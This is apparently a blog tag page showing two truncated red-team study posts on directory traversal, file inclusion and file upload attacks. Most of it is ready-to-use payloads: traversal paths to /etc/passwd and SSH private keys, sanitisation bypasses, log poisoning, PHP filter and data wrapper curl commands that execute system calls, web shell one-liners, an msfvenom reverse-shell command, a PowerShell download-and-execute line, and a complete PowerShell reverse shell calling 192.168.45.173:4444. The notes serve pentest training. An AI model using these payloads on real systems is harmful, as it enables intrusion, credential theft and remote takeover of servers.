Tag: Cybersecurity Red Team (网安红队)

2 Posts

File Inclusion & Directory Traversal
Directory Traversal

  Enumerate users:
    ../../../../../../../../../../../../../etc/passwd
  Read SSH private keys:
    ../../../../../../../../../../../../../home/offsec/.ssh/id_rsa

  Protection evasion
    Removal of path traversal characters (../):
      1. Use ..../////, which becomes ../ after sanitization
      2. URL encode
    Approved path: go to the approved path, then go back
    Append extension in the backend

File Inclusion

  Local File Inclusion (LFI)
    1. Identify a local file on the server to which we can add source code (e.g. a web application log file)
    2. Insert payload code into the local file (log poisoning)
    3. Exploit the local file inclusion vulnerability to execute that file
    Log path on Linux:
      ../../../../../../../../../var/log/apache2/access.log
    Log path on Windows (XAMPP):
      C:\xampp\apache\logs\access.log

  Use of PHP wrappers
    php://filter
      The php://filter wrapper makes the application include the contents of the file without executing it.
      curl http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php
      curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php
    data://
      The data:// wrapper makes the application interpret the included contents as source code.
      curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
      echo -n '<?php echo system($_GET["cmd"]);?>' | base64
      curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"

  Remote File Inclusion (RFI)
    Host a web server on the attacker machine to serve the remote file to be included
    Make a request to the target web application to connect to the…
File Upload Vulnerability
Web Shell Upload

Web Shell
  Check the programming language of the web app: enumerate common index page extensions, Wappalyzer
  Write a basic web shell payload in that programming language to check whether there is any validation, for example:
    <?php file_get_contents('/etc/passwd'); ?>
    <?php system('hostname'); ?>
    <?php system($_REQUEST['cmd']); ?>
    <% eval request('cmd') %>
  Tools for opening a web shell: phpbash, SecLists (PHP), Antak Webshell (ASPX)

Reverse Web Shell
  Main idea: use the web shell to initiate a remote session from the target machine to the pentester's machine, thus enabling an interactive terminal on the target machine.
  Tools for opening a reverse web shell: php-reverse-shell
  Generate a reverse shell with msfvenom:
    msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
  Reverse shell for Windows:
    PowerShell command to execute a remote script:
      powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173/ps.ps1')"
    Contents of backdoor.ps1:
      $client = New-Object System.Net.Sockets.TCPClient('192.168.45.173',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  Command…